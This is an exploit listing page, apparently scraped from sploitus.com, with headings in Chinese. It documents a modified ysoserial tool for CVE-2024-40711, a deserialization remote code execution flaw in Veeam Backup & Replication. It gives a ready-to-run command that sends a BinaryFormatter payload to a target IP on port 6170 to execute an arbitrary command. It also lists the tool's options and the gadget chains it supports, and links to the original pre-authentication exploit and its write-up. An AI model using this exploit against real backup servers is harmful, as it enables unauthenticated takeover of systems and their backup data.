Share
## https://sploitus.com/exploit?id=8F3163F4-A918-511B-9906-2420C9711DAB
# 用法
```
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
```
```
Usage: ysoserial.exe [options]
Options:
--vi, --targetveeamip=VALUE
The target Veeam Backup and reaplication IP
address
--vp, --targetveeamport=VALUE
The target Veeam Backup and reaplication port
(default: 6170)
--vc, --veeamexpcmd=VALUE
The target Veeam Backup and reaplication what
commands will be executed
--vg, --veeamgadget=VALUE
The target Veeam Backup and reaplication what
gadget will be use (default: DataSet)
```
![cve-2024-4711](./assets/cve-2024-4711.gif)
其他利用链
```
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo
```
必须使用SoapFormatter所支持的利用链
# 引用
[watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)](https://github.com/watchtowrlabs/CVE-2024-40711)
[Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/)